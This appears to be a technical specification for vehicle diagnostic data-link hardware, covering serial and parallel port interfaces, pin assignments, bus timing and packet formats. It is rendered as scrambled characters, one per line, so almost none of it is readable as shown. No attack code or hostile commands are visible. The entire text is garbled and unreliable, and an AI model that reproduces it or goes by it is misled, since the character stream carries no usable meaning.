o
d
m
l
©
¤
¤
X
S
T
{
_
V
W
W
T
_
{
O
¤
Q
Y
Z
Y
\
]
T
Z
Y
^
Y
_
`
S
t
e
Z
`
Q
Y
U
e
^
}
]
`
Y
Z
T
_
`
Y
Z
t
V
U
Y
e
t
V
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
V
Z
Y
e
_
Y
j
T
`
e
t
T
_
}
]
`
È
e
_
Y
j
T
`
e
t
e
]
`
}
]
`
È
V
_
c
V
c
e
]
j
W
Y
Y
c
{
Y
S
Y
_
S
T
`
T
v
Y
T
_
`
Y
Z
Z
]
}
`
e
_
`
Q
Y
T
_
}
]
`
O
P
Z
e
U
Y
S
S
e
Z
U
W
e
U
s
S
}
Y
Y
c
È
T
_
`
Y
Z
Z
]
}
`
W
V
`
Y
_
U
R
È
V
_
c
k
©
m
W
V
`
Y
_
U
R
^
V
R
V
ë
Y
U
`
`
Q
Y
^
V
¨
T
^
]
^
}
e
S
S
T
j
W
Y
c
V
`
V
Z
V
`
Y
S
È
V
_
c
^
V
R
^
V
s
Y
S
e
^
Y
e
Z
V
W
W
e
t
`
Q
Y
_
Y
`
r
e
Z
s
`
R
}
Y
S
T
^
}
e
S
S
T
j
W
Y
`
e
T
^
}
W
Y
^
Y
_
`
r
T
`
Q
V
}
V
Z
`
T
U
]
W
V
Z
T
_
`
Y
Z
t
V
U
Y
O
¥
e
Z
S
W
e
r
Y
Z
j
]
S
S
Y
S
È
}
e
W
W
T
_
{
r
T
`
Q
V
W
Y
v
Y
W
S
Y
_
S
T
`
T
v
Y
e
Z
S
T
_
{
W
Y
Y
c
{
Y
S
Y
_
S
T
`
T
v
Y
T
_
`
Y
Z
Z
]
}
`
e
Z
_
e
T
_
`
Y
Z
Z
]
}
`
^
V
R
j
Y
V
c
Y
\
]
V
`
Y
e
_
t
V
S
`
Y
Z
}
Z
e
U
Y
S
S
e
Z
S
O
F
ÿ
ÿ
F
L
I
H
¯
¤
Q
T
S
c
Y
v
T
U
Y
T
_
`
Y
Z
t
V
U
Y
S
r
T
`
Q
V
S
Y
Z
T
V
W
}
e
Z
`
V
S
S
}
Y
U
T
£
Y
c
j
R
¤
k
p
¢
h
a
h
O
m
_
W
R
`
Q
Y
k
l
m
j
]
S
`
R
}
Y
T
S
U
e
^
}
V
`
T
j
W
Y
r
T
`
Q
`
Q
Y
·
p
[
¤
e
t
`
Q
Y
S
Y
Z
T
V
W
}
e
Z
`
O
¥
e
Z
`
Q
Y
i
P
b
È
P
b
d
È
V
_
c
o
p
q
j
]
S
`
R
}
Y
S
È
}
]
W
S
Y
S
V
Z
Y
^
Y
V
S
]
Z
Y
c
V
_
c
{
Y
_
Y
Z
V
`
Y
c
v
T
V
S
e
t
`
r
V
Z
Y
O
l
T
_
U
Y
`
Q
Y
P
b
d
V
_
c
o
p
q
j
]
S
Y
S
U
e
^
^
]
_
T
U
V
`
Y
V
`
t
V
S
`
Y
Z
c
V
`
V
Z
V
`
Y
S
È
S
e
^
Y
Q
V
Z
c
r
V
Z
Y
^
V
R
_
e
`
j
Y
V
j
W
Y
`
e
}
Z
e
v
T
c
Y
`
Q
Y
Z
Y
V
W
`
T
^
Y
Z
Y
S
}
e
_
S
Y
_
Y
U
Y
S
S
V
Z
R
`
e
S
]
}
}
e
Z
`
Y
T
`
Q
Y
Z
e
Z
j
e
`
Q
Q
T
{
Q
Y
Z
S
}
Y
Y
c
j
]
S
S
Y
S
O
`
e
c
e
o
p
q
T
S
S
]
Y
S
T
S
o
p
q
t
Y
V
S
T
j
W
Y
V
`
V
W
W
¦
o
p
q
¤
¨
v
S
O
k
l
m
X
¢
W
T
_
Y
¤
¨
È
r
Q
T
U
Q
T
S
^
e
Z
Y
]
S
Y
t
]
W
¦
`
e
c
e
§
V
U
Q
j
]
S
U
e
_
_
Y
U
`
S
F
ÿ
ÿ
¹
H
I
H
¯
¯
L
¯
¤
Q
T
S
c
Y
v
T
U
Y
T
_
`
Y
Z
t
V
U
Y
S
r
T
`
Q
V
}
V
Z
V
W
W
Y
W
}
e
Z
`
V
S
S
}
Y
U
T
£
Y
c
j
R
k
§
§
§
N
h
|
n
O
¤
Q
T
S
c
Y
v
T
U
Y
S
]
}
}
e
Z
`
S
`
Q
Y
i
P
b
È
P
b
d
È
V
_
c
k
l
m
j
]
S
`
R
}
Y
S
O
l
T
_
U
Y
e
_
W
R
e
_
Y
}
T
_
e
_
`
Q
Y
}
V
Z
V
W
W
Y
W
}
e
Z
`
`
Z
T
{
{
Y
Z
S
V
_
T
_
`
Y
Z
Z
]
}
`
È
V
_
c
`
Q
Y
_
e
_
W
R
e
_
`
Q
Y
Z
T
S
T
_
{
Y
c
{
Y
È
V
c
c
T
`
T
e
_
V
W
Q
V
Z
c
r
V
Z
Y
V
S
r
Y
W
W
V
S
S
e
t
`
r
V
Z
Y
e
v
Y
Z
Q
Y
V
c
T
S
_
Y
U
Y
S
S
V
Z
R
`
e
V
U
U
e
^
^
e
c
V
`
Y
T
_
`
Y
Z
t
V
U
Y
S
e
_
`
Q
T
S
}
e
Z
`
O
w
u
~
¢
}
T
_
S
Y
Z
T
V
W
t
]
_
U
`
T
e
_
c
T
Z
Y
U
`
T
e
_
k
[
t
]
_
U
`
T
e
_
N
u
o
u
T
_
c
Y
W
`
V
o
p
q
[
¨
h
[
¨
u
T
_
_
e
k
l
m
¢
W
T
_
Y
[
¨
a
¤
¨
u
e
]
`
_
e
k
l
m
¢
W
T
_
Y
¤
¨
n
u
¤
[
e
]
`
_
e
k
l
m
X
¢
W
T
_
Y
¤
¨
w
x
q
u
_
e
S
T
{
_
V
W
{
Z
e
]
_
c
ª
u
l
[
T
_
c
Y
W
`
V
k
l
m
X
¢
W
T
_
Y
[
¨
y
[
¤
l
e
]
`
_
e
i
P
b
©
P
b
d
¤
¨
|
o
¤
l
T
_
c
Y
W
`
V
i
P
b
©
P
b
d
[
¨
[
k
T
_
t
V
W
W
T
_
{
Y
c
{
Y
¤
V
j
W
Y
w
l
Y
Z
T
V
W
z
V
Z
c
r
V
Z
Y
k
_
`
Y
Z
t
V
U
Y
P
T
_
p
S
S
T
{
_
^
Y
_
`
S
u
~
¢
}
T
_
S
Y
Z
T
V
W
t
]
_
U
`
T
e
_
c
T
Z
Y
U
`
T
e
_
k
[
t
]
_
U
`
T
e
_
i
P
b
©
P
b
d
k
l
m
o
p
q
N
u
o
u
T
_
c
Y
W
`
V
h
[
¨
u
T
_
_
e
·
p
[
¤
[
¨
¢
W
T
_
Y
[
¨
a
¤
¨
u
e
]
`
_
e
·
p
[
¤
¤
¨
¢
W
T
_
Y
¤
¨
n
u
¤
[
e
]
`
_
e
S
e
t
`
r
V
Z
Y
¤
¨
¤
¨
X
¢
W
T
_
Y
¤
¨
¤
¨
w
x
q
u
_
e
S
T
{
_
V
W
{
Z
e
]
_
c
ª
u
l
[
T
_
c
Y
W
`
V
S
e
t
`
r
V
Z
Y
[
¨
[
¨
X
¢
W
T
_
Y
[
¨
[
¨
y
[
¤
l
e
]
`
_
e
|
o
¤
l
T
_
c
Y
W
`
V
[
k
T
_
t
V
W
W
T
_
{
Y
c
{
Y
¤
V
j
W
Y
ª
l
Y
Z
T
V
W
z
V
Z
c
r
V
Z
Y
k
_
`
Y
Z
t
V
U
Y
P
T
_
p
S
S
T
{
_
^
Y
_
`
S
ª
u
~
¢
h
w
}
T
_
}
V
Z
V
W
W
Y
W
}
e
Z
`
t
]
_
U
`
T
e
_
c
T
Z
Y
U
`
T
e
_
k
[
t
]
_
U
`
T
e
_
N
©
l
¤
[
m
~
§
e
]
`
h
u
¡
e
]
`
k
l
m
¢
W
T
_
Y
¤
¨
a
u
N
e
]
`
k
l
m
X
¢
W
T
_
Y
¤
¨
n
u
h
e
]
`
i
P
b
©
P
b
d
¤
¨
w
u
a
e
]
`
o
p
q
¤
¨
ª
u
n
e
]
`
y
u
w
e
]
`
|
u
ª
e
]
`
u
y
e
]
`
N
¡
©
p
o
T
_
}
e
S
T
`
T
v
Y
Y
c
{
Y
[
¨
r
T
Z
Y
c
m
[
N
N
~
·
l
T
_
k
l
m
¢
W
T
_
Y
[
¨
N
h
P
§
T
_
k
l
m
X
¢
W
T
_
Y
[
¨
N
a
l
§
X
k
q
T
_
i
P
b
©
P
b
d
[
¨
N
n
©
p
·
¤
m
¥
u
e
]
`
N
w
©
§
[
[
m
[
T
_
o
p
q
[
¨
N
ª
©
k
q
k
¤
e
]
`
N
y
©
l
§
X
e
]
`
N
|
¢
h
w
x
q
u
S
T
{
_
V
W
{
Z
e
]
_
c
¤
V
j
W
Y
y
P
V
Z
V
W
W
Y
W
z
V
Z
c
r
V
Z
Y
k
_
`
Y
Z
t
V
U
Y
P
T
_
p
S
S
T
{
_
^
Y
_
`
S
F
ÿ
ÿ
M
¹
¬
¤
Q
Y
x
P
k
m
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
]
S
Y
S
{
Y
_
Y
Z
V
W
}
]
Z
}
e
S
Y
k
m
f
x
P
k
m
g
}
T
_
S
e
_
V
^
T
U
Z
e
¢
}
Z
e
U
Y
S
S
e
Z
e
Z
}
Y
Z
T
}
Q
Y
Z
V
W
U
e
_
`
Z
e
W
W
Y
Z
O
p
c
T
ë
Y
Z
Y
_
`
s
Y
Z
_
Y
W
c
Z
T
v
Y
Z
r
T
W
W
j
Y
Z
Y
\
]
T
Z
Y
c
t
e
Z
Y
V
U
Q
c
Y
v
T
U
Y
c
]
Y
`
e
v
V
Z
T
V
`
T
e
_
S
T
_
`
Q
Y
S
}
Y
U
T
£
U
Q
V
Z
c
r
V
Z
Y
]
S
Y
c
O
ì
í
ô
ø
ô
ø
÷
ô
þ
ô
ö
ò
ý
÷
ò
ó
÷
ñ
¤
Q
Y
S
Y
c
Y
v
T
U
Y
S
]
`
T
W
T
Y
^
e
Z
Y
Q
V
Z
c
r
V
Z
Y
`
e
c
Y
U
e
c
Y
`
Q
Y
c
V
`
V
W
T
_
s
}
Z
e
`
e
U
e
W
`
Q
V
_
S
e
t
`
¢
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
S
O
¤
Q
Y
S
Y
c
Y
v
T
U
Y
S
Q
V
v
Y
^
e
Z
Y
U
e
^
}
W
Y
¨
Q
V
Z
c
r
V
Z
Y
È
V
Z
Y
{
Y
_
Y
Z
¢
V
W
W
R
^
e
Z
Y
Y
¨
}
Y
_
S
T
v
Y
È
j
]
`
Z
Y
\
]
T
Z
Y
W
Y
S
S
Q
e
S
`
S
R
S
`
Y
^
Z
Y
S
e
]
Z
U
Y
S
`
e
e
}
Y
Z
V
`
Y
O
F
ÿ
M
ÿ
F
®
³
I
³
²
I
¯
¯
L
I
L
²
L
I
H
¯
¹
´
I
µ
L
®
³
I
³
²
I
¯
¯
L
I
¤
Q
Y
S
Y
c
Y
v
T
U
Y
S
]
S
Y
V
{
Y
_
Y
Z
V
W
}
]
Z
}
e
S
Y
^
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
`
e
}
Y
Z
t
e
Z
^
`
Q
Y
Z
Y
V
W
`
T
^
Y
t
]
_
U
`
T
e
_
S
e
t
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
O
p
_
R
{
Y
_
Y
Z
V
W
}
]
Z
}
e
S
Y
^
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
r
e
]
W
c
j
Y
S
]
T
`
V
j
W
Y
È
S
]
U
Q
V
S
`
Q
Y
ª
|
z
o
N
N
È
|
¡
w
N
È
e
Z
^
e
Z
Y
^
e
c
Y
Z
_
v
V
Z
T
V
_
`
S
S
]
U
Q
V
S
`
Q
Y
P
k
o
e
Z
pi
[
O
k
_
V
c
c
T
`
T
e
_
`
e
`
Q
Y
^
T
U
Z
e
U
e
_
¢
`
Z
e
W
W
Y
Z
È
V
c
c
T
`
T
e
_
V
W
U
T
Z
U
]
T
`
Z
R
T
S
_
Y
U
Y
S
S
V
Z
R
`
e
T
_
`
Y
Z
t
V
U
Y
`
Q
Y
j
]
S
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
O
µ
L
³
H
¯
¹
´
I
µ
L
®
³
I
³
²
I
¯
¯
L
I
¤
Q
Y
Z
Y
V
Z
Y
V
t
Y
r
^
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
S
c
Y
¢
S
T
{
_
Y
c
S
}
Y
U
T
£
U
V
W
W
R
t
e
Z
V
]
`
e
^
e
`
T
v
Y
c
T
V
{
_
e
S
`
T
U
T
_
`
Y
Z
t
V
U
Y
V
}
}
W
T
U
V
`
T
e
_
S
O
¤
Q
Y
S
Y
c
Y
v
T
U
Y
y
V
Z
Y
{
Y
_
Y
Z
V
W
W
R
Z
Y
S
`
Z
T
U
`
Y
c
`
e
_
Y
`
r
e
Z
s
}
Z
e
`
e
U
e
W
S
_
Y
U
Y
S
S
V
Z
R
t
e
Z
T
^
}
W
Y
^
Y
_
`
T
_
{
V
S
U
V
_
`
¢
e
e
W
O
u
Y
v
T
U
Y
S
^
V
R
U
e
_
`
V
T
_
S
e
^
Y
e
Z
V
W
W
e
t
`
Q
Y
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
T
_
`
Y
Z
t
V
U
Y
U
T
Z
U
]
T
`
Z
R
O
¤
Q
Y
S
Y
c
Y
v
T
U
Y
S
T
_
U
W
]
c
Y
`
Q
Y
§
W
^
§
W
Y
U
`
Z
e
_
T
U
S
§
X
d
a
¨
¨
V
_
c
`
Q
Y
m
Y
Y
_
§
W
Y
s
`
Z
e
_
T
s
d
e
j
R
c
T
U
O
L
µ
´
I
µ
L
J
¸
²
´
L
I
G
H
I
J
K
H
I
L
¤
Q
T
S
c
Y
v
T
U
Y
W
Y
v
Y
Z
V
{
Y
S
`
Q
Y
}
Z
e
{
Z
V
^
^
V
j
W
Y
_
V
`
]
Z
Y
e
t
V
_
e
ë
¢
`
Q
Y
¢
S
Q
Y
W
t
·
l
~
`
e
S
Y
Z
T
V
W
U
e
_
v
Y
Z
`
Y
Z
O
p
S
r
T
`
Q
`
Q
Y
{
Y
_
Y
Z
V
W
}
]
Z
}
e
S
Y
^
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
c
Y
S
T
{
_
S
È
V
c
c
T
`
T
e
_
V
W
U
T
Z
U
]
T
`
Z
R
T
S
_
Y
U
Y
S
S
V
Z
R
`
e
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
j
]
S
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
O
o
]
S
`
e
^
£
Z
^
r
V
Z
Y
T
S
W
e
V
c
Y
c
t
Z
e
^
`
Q
Y
Q
e
S
`
^
V
U
Q
T
_
Y
`
e
`
Q
Y
·
l
~
V
c
V
}
`
Y
Z
`
e
}
Y
Z
t
e
Z
^
c
Y
U
e
c
Y
e
t
`
Q
Y
c
V
`
V
W
T
_
s
}
Z
e
`
e
U
e
W
O
F
ÿ
M
ÿ
¹
I
I
H
H
¯
L
G
H
I
J
K
H
I
L
¤
Q
Y
T
_
`
Y
Z
t
V
U
Y
j
V
S
Y
c
e
_
}
Z
e
{
Z
V
^
^
V
j
W
Y
Q
V
Z
c
r
V
Z
Y
È
S
]
U
Q
V
S
V
_
¥
P
x
p
e
Z
P
X
u
È
}
Y
Z
¢
t
e
Z
^
S
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
r
T
`
Q
}
Z
e
{
Z
V
^
^
V
j
W
Y
W
e
{
T
U
O
p
c
c
T
`
T
e
_
V
W
U
T
Z
U
]
T
`
Z
R
_
Y
Y
c
Y
c
T
S
`
Q
Y
}
Q
R
S
T
U
V
W
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
Q
e
S
`
V
_
c
`
Q
Y
V
]
`
e
^
e
j
T
W
Y
O
p
}
Z
e
{
Z
V
^
^
V
j
W
Y
Q
V
Z
c
¢
r
V
Z
Y
c
Y
v
T
U
Y
U
V
_
}
e
`
Y
_
`
T
V
W
W
R
R
T
Y
W
c
j
Y
`
`
Y
Z
}
Y
Z
t
e
Z
^
V
_
U
Y
È
r
Q
T
U
Q
^
V
`
`
Y
Z
^
e
S
`
r
Q
Y
_
S
]
}
}
e
Z
`
T
_
{
^
e
Z
Y
`
Q
V
_
e
_
Y
j
]
S
T
_
V
S
T
_
{
W
Y
c
Y
v
T
U
Y
È
V
_
c
r
Q
Y
_
S
]
}
}
e
Z
`
T
_
{
Q
T
{
Q
c
V
`
V
Z
V
`
Y
j
]
S
S
Y
S
O
F
ÿ
M
ÿ
M
L
!
L
¯
µ
L
²
±
H
I
J
¤
Q
T
S
T
_
`
Y
Z
t
V
U
Y
T
S
j
V
S
Y
c
e
_
V
_
Y
^
j
Y
c
c
Y
c
P
o
O
¤
Q
T
S
c
Y
v
T
U
Y
T
S
^
]
U
Q
W
T
s
Y
V
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
È
T
_
`
Q
V
`
V
{
Y
_
Y
Z
V
W
}
]
Z
}
e
S
Y
U
e
^
}
]
`
Y
Z
}
Y
Z
t
e
Z
^
S
c
V
`
V
W
T
_
s
c
Y
U
e
c
Y
O
z
e
r
Y
v
Y
Z
È
`
Q
V
`
U
e
^
}
]
`
Y
Z
c
e
Y
S
_
e
`
}
Y
Z
t
e
Z
^
e
`
Q
Y
Z
t
]
_
U
`
T
e
_
S
S
]
U
Q
V
S
^
V
_
V
{
T
_
{
V
]
S
Y
Z
T
_
`
Y
Z
t
V
U
Y
È
j
]
`
T
_
S
`
Y
V
c
U
e
^
^
]
_
T
U
V
`
Y
S
e
v
Y
Z
V
_
Y
`
r
e
Z
s
`
e
V
_
e
`
Q
Y
Z
U
e
^
}
]
`
Y
Z
O
¤
Q
Y
£
Z
^
r
V
Z
Y
t
e
Z
S
]
U
Q
c
Y
v
T
U
Y
S
^
V
R
j
Y
`
Q
Y
S
V
^
Y
V
S
V
S
e
t
`
r
V
Z
Y
c
V
`
V
W
T
_
s
c
Y
v
T
U
Y
È
T
O
Y
O
È
V
X
T
_
]
¨
s
Y
Z
_
Y
W
c
Y
v
T
U
Y
c
Z
T
v
Y
Z
È
e
Z
T
`
^
V
R
Z
]
_
V
^
e
Z
Y
S
}
Y
U
T
V
W
T
Y
c
c
Z
T
v
Y
Z
]
_
c
Y
Z
V
S
T
^
}
W
Y
Z
e
}
Y
Z
V
`
T
_
{
S
R
S
`
Y
^
S
]
U
Q
V
S
Y
o
e
S
e
Z
u
m
l
O
"
#
A
¼
C
æ
¾
Ã
D
í
ì
÷
ò
ó
÷
î
ø
þ
ó
õ
ñ
ÿ
F
ÿ
F
K
H
I
L
H
H
$
²
L
!
³
L
%
L
I
²
L
¯
²
L
I
H
³
L
¤
Q
Y
s
Y
Z
_
Y
W
c
Y
v
T
U
Y
c
Z
T
v
Y
Z
}
Z
Y
S
Y
_
`
S
V
U
Q
V
Z
V
U
`
Y
Z
c
Y
v
T
U
Y
r
T
`
Q
Z
V
r
V
U
U
Y
S
S
`
e
`
Q
Y
U
V
}
V
j
T
W
T
`
T
Y
S
e
t
`
Q
Y
c
Y
v
T
U
Y
O
u
V
`
V
T
S
S
Y
_
`
`
e
V
_
c
t
Z
e
^
`
Q
Y
c
Y
v
T
U
Y
£
W
Y
V
_
c
U
e
_
`
Z
e
W
T
_
t
e
Z
^
V
`
T
e
_
T
S
}
V
S
S
Y
c
v
T
V
T
e
U
`
W
S
O
H
H
¤
Q
Y
c
V
`
V
T
S
U
e
^
}
e
S
Y
c
e
t
a
h
j
T
`
}
V
U
s
Y
`
S
O
§
V
U
Q
}
V
U
s
Y
`
S
}
Y
U
T
£
Y
S
e
_
Y
}
]
W
S
Y
O
¤
Q
Y
t
e
Z
^
V
`
e
t
Y
V
U
Q
c
V
`
V
}
V
U
s
Y
`
T
S
c
Y
S
U
Z
T
j
Y
c
T
_
`
V
j
W
Y
|
O
±
´
¸
²
&
´
I
H
²
¤
Q
Y
t
e
W
W
e
r
T
_
{
T
e
U
`
W
S
V
Z
Y
]
S
Y
c
`
e
S
}
Y
U
T
t
R
`
Q
Y
j
]
S
S
Y
S
`
e
Y
_
V
j
W
Y
|
j
T
`
t
]
_
U
`
T
e
_
a
N
¢
h
|
j
]
S
_
]
^
j
Y
Z
h
w
¢
h
y
]
_
]
S
Y
c
È
Z
Y
S
Y
Z
v
Y
c
t
e
Z
t
]
`
]
Z
Y
Y
¨
}
V
_
S
T
e
_
h
n
}
]
W
S
Y
}
e
W
V
Z
T
`
R
h
a
¢
¡
}
]
W
S
Y
W
Y
_
{
`
Q
T
_
_
V
_
e
S
Y
U
e
_
c
S
f1ns − 16.8ms ± 1ns
g
¤
V
j
W
Y
|
u
V
`
V
P
V
U
s
Y
`
¥
e
Z
^
V
`
q
V
^
Y
i
V
W
]
Y
u
Y
S
U
Z
T
}
`
T
e
_
k
¥
l
¡
u
Y
V
S
S
Y
Z
`
Y
c
j
]
S
`
T
^
Y
e
]
`
È
V
W
S
e
s
_
e
r
_
V
S
T
_
`
Y
Z
t
Z
V
^
Y
S
Y
}
V
Z
V
`
T
e
_
O
~
[
§
p
N
p
S
S
Y
Z
`
Y
c
j
]
S
`
T
^
Y
e
]
`
È
V
W
S
e
s
_
e
r
_
V
S
j
Z
Y
V
s
O
¤
V
j
W
Y
P
]
W
S
Y
o
e
_
£
{
]
Z
V
`
T
e
_
k
u
S
•
S
Y
`
'
j
]
S
Y
_
V
j
W
Y
f
T
_
`
j
]
S
^
V
S
s
g
•
{
Y
`
'
j
]
S
Y
_
V
j
W
Y
f
T
_
`
(
j
]
S
^
V
S
s
g
¤
Q
Y
j
]
S
T
_
`
Y
Z
t
V
U
Y
S
`
e
Y
_
V
j
W
Y
T
S
S
}
Y
U
T
£
Y
c
V
S
V
j
T
`
^
V
S
s
È
V
S
Y
`
j
T
`
Y
_
V
j
W
Y
S
`
Q
Y
S
}
Y
U
T
£
Y
c
j
]
S
O
~
]
S
S
Y
S
`
Q
V
`
V
Z
Y
_
e
`
Y
_
V
j
W
Y
c
r
T
W
W
_
e
`
Z
Y
U
Y
T
v
Y
e
Z
S
Y
_
c
c
V
`
V
O
¹
´
¯
L
¸
²
&
´
I
H
²
¤
Q
Y
t
e
W
W
e
r
T
_
{
T
e
U
`
W
S
V
Z
Y
]
S
Y
c
`
e
U
e
_
£
{
]
Z
V
`
T
e
_
U
Y
Z
`
V
T
_
}
]
W
S
Y
S
•
S
Y
`
'
}
]
W
S
Y
f
T
_
`
T
c
È
T
_
`
}
]
W
S
Y
g
•
{
Y
`
'
}
]
W
S
Y
f
T
_
`
T
c
È
T
_
`
(
}
]
W
S
Y
g
¤
Q
Y
T
_
`
Y
Z
t
Z
V
^
Y
S
Y
}
V
Z
V
`
T
e
_
f
k
¥
l
g
`
T
^
Y
T
S
`
Q
Y
^
T
_
T
^
]
^
}
]
W
S
Y
Z
Y
\
]
T
Z
Y
c
j
Y
`
r
Y
Y
_
}
V
U
s
Y
`
S
O
p
_
R
}
]
W
S
Y
W
e
_
{
Y
Z
`
Q
V
_
`
Q
T
S
T
S
V
S
S
]
^
Y
c
`
e
j
Y
Y
\
]
T
v
V
W
Y
_
`
`
e
È
V
_
c
T
S
Z
Y
¢
}
e
Z
`
Y
c
V
S
È
`
Q
T
S
W
Y
_
{
`
Q
O
¤
Q
Y
j
Z
Y
V
s
S
T
{
_
V
W
T
S
`
Q
Y
^
V
¨
T
^
]
^
V
S
S
Y
Z
`
Y
c
}
]
W
S
Y
r
T
c
`
Q
È
]
S
Y
c
`
e
T
_
`
Y
Z
Z
]
}
`
V
`
Z
V
_
S
t
Y
Z
O
¤
Q
Y
T
_
`
Y
Z
t
Z
V
^
Y
S
Y
}
V
Z
V
`
T
e
_
fk
¥
l
g
`
T
^
Y
T
S
`
Q
Y
^
T
_
¢
T
^
]
^
}
]
W
S
Y
Z
Y
\
]
T
Z
Y
c
j
Y
`
r
Y
Y
_
`
r
e
}
V
U
s
Y
`
S
È
V
W
S
e
U
V
W
W
Y
c
`
Q
Y
j
]
S
T
c
W
Y
`
T
^
Y
O
¤
Q
Y
e
c
c
k
u
S
S
}
Y
U
T
t
R
}
]
W
S
Y
S
t
e
Z
V
_
V
S
S
Y
Z
`
Y
c
j
]
S
V
_
c
`
Q
Y
Y
v
Y
_
k
u
S
S
}
Y
U
T
t
R
}
]
W
S
Y
S
t
e
Z
V
c
Y
V
S
S
Y
Z
`
Y
c
j
]
S
O
¤
Q
Y
Z
Y
t
e
Z
Y
È
`
Q
Y
W
e
{
T
U
V
W
}
e
W
V
Z
T
`
R
e
t
`
Q
Y
}
]
W
S
Y
T
S
S
}
Y
U
T
£
Y
c
j
R
`
Q
Y
W
e
r
Y
S
`
j
T
`
O
¤
V
j
W
Y
W
T
S
`
S
`
Q
Y
c
Y
£
_
Y
c
}
]
W
S
Y
k
u
S
O
¤
Q
Y
`
T
^
Y
}
V
Z
V
^
Y
`
Y
Z
T
S
S
}
Y
U
T
£
Y
c
T
_
`
Q
Y
S
V
^
Y
t
e
Z
^
V
`
V
S
`
Q
Y
c
V
`
V
}
V
U
s
Y
`
S
O
¤
Q
Y
}
]
W
S
Y
}
e
W
V
Z
T
`
R
S
}
Y
U
T
£
Y
S
`
Q
Y
}
Q
R
S
T
U
V
W
}
e
W
V
Z
T
`
R
e
t
`
Q
Y
S
T
{
_
V
W
È
`
e
V
W
W
e
r
t
e
Z
Y
W
Y
U
`
Z
T
U
V
W
W
R
T
_
v
Y
Z
`
Y
c
j
]
S
S
Y
S
V
_
c
©
e
Z
T
_
`
Y
Z
t
V
U
Y
S
O
¤
Q
Y
j
]
S
_
]
^
j
Y
Z
£
Y
W
c
e
t
`
Q
Y
}
]
W
S
Y
T
S
T
{
_
e
Z
Y
c
O
ÿ
F
ÿ
¬
±
¬
!
L
I
I
L
H
¹
I
³
¯
¤
Q
Y
m
~
u
e
v
Y
Z
S
`
Z
Y
V
^
}
Z
e
`
e
U
e
W
T
S
]
S
Y
c
`
e
Y
_
U
V
}
S
]
W
V
`
Y
}
V
U
s
Y
`
T
Y
c
m
~
u
c
V
`
V
e
v
Y
Z
V
j
R
`
Y
S
`
Z
Y
V
^
O
k
`
T
S
]
S
Y
c
`
e
`
]
_
_
Y
W
V
]
`
e
^
e
`
T
v
Y
j
]
S
S
Y
S
e
v
Y
Z
S
Y
Z
T
V
W
W
T
_
Y
S
V
_
c
S
e
U
s
Y
`
S
O
j
R
`
Y
S
Y
\
]
Y
_
U
Y
^
Y
V
_
T
_
{
§
q
u
§
_
c
e
t
}
V
U
s
Y
`
O
§
l
o
§
l
o
'
§
q
u
§
q
u
c
V
`
V
T
_
}
V
U
s
Y
`
O
§
l
o
§
l
o
'
§
l
o
§
l
o
c
V
`
V
T
_
}
V
U
s
Y
`
O
¤
V
j
W
Y
N
¡
m
~
u
m
v
Y
Z
l
`
Z
Y
V
^
o
e
_
`
Z
e
W
o
Q
V
Z
V
U
`
Y
Z
S
¤
V
j
W
Y
N
¡
S
]
^
^
V
Z
T
Y
S
j
R
`
Y
S
Y
\
]
Y
_
U
Y
S
T
_
`
Q
Y
S
`
Z
Y
V
^
`
Q
V
`
Q
V
v
Y
S
}
Y
U
T
V
W
^
Y
V
_
T
_
{
O
b
Q
Y
Z
Y
V
}
}
W
T
U
V
j
W
Y
È
`
Q
Y
S
Y
j
R
`
Y
S
Y
\
]
Y
_
U
Y
S
V
_
c
`
Q
Y
T
Z
_
]
^
Y
Z
T
U
v
V
W
]
Y
S
V
Z
Y
S
Q
V
Z
Y
c
r
T
`
Q
S
T
^
T
W
V
Z
T
^
}
W
Y
^
Y
_
`
V
`
T
e
_
S
f
Y
O
{
O
È
l
X
k
P
V
_
c
k
l
l
g
O
¥
e
Z
j
]
S
S
Y
S
`
Q
V
`
S
}
Y
U
T
t
R
V
_
T
_
T
`
T
V
W
T
V
`
T
e
_
}
Z
e
U
Y
c
]
Z
Y
`
Q
V
`
c
e
Y
S
_
e
`
]
`
T
W
T
Y
`
Q
Y
]
S
]
V
W
j
]
S
S
R
^
j
e
W
S
È
`
Q
T
S
}
Z
e
U
Y
c
]
Z
Y
r
T
W
W
j
Y
}
Y
Z
t
e
Z
^
Y
c
V
]
`
e
^
V
`
T
U
V
W
W
R
`
Q
Y
£
Z
S
`
`
T
^
Y
`
Q
Y
S
e
U
s
Y
`
T
S
e
}
Y
_
Y
c
O
k
t
`
Q
Y
T
_
T
`
T
V
W
T
V
`
T
e
_
}
Z
e
U
Y
c
]
Z
Y
U
V
_
c
Y
`
Y
Z
^
T
_
Y
r
Q
Y
`
Q
Y
Z
e
Z
_
e
`
V
j
]
S
T
S
}
Z
Y
S
Y
_
`
È
`
Q
T
S
T
_
t
e
Z
^
V
`
T
e
_
T
S
V
v
V
T
W
V
j
W
Y
`
Q
Z
e
]
{
Q
`
Q
Y
U
e
_
`
Z
e
W
S
e
U
s
Y
`
O
p
_
R
£
_
V
W
T
V
`
T
e
_
}
Z
e
U
Y
c
]
Z
Y
T
S
}
Y
Z
t
e
Z
^
Y
c
V
t
`
Y
Z
V
W
W
V
}
}
W
T
U
V
`
T
e
_
S
U
W
e
S
Y
`
Q
Y
S
e
U
s
Y
`
O
p
_
V
c
c
T
`
T
e
_
V
W
S
e
U
s
Y
`
Y
¨
T
S
`
S
t
e
Z
}
Y
Z
t
e
Z
^
T
_
{
U
e
_
£
{
]
Z
V
`
T
e
_
V
_
c
e
]
`
e
t
j
V
_
c
U
e
_
`
Z
e
W
e
t
j
]
S
T
_
`
Y
Z
t
V
U
Y
S
O
o
e
_
`
Z
e
W
t
]
_
U
`
T
e
_
S
T
_
U
W
]
c
Y
`
Q
Y
t
e
W
W
e
r
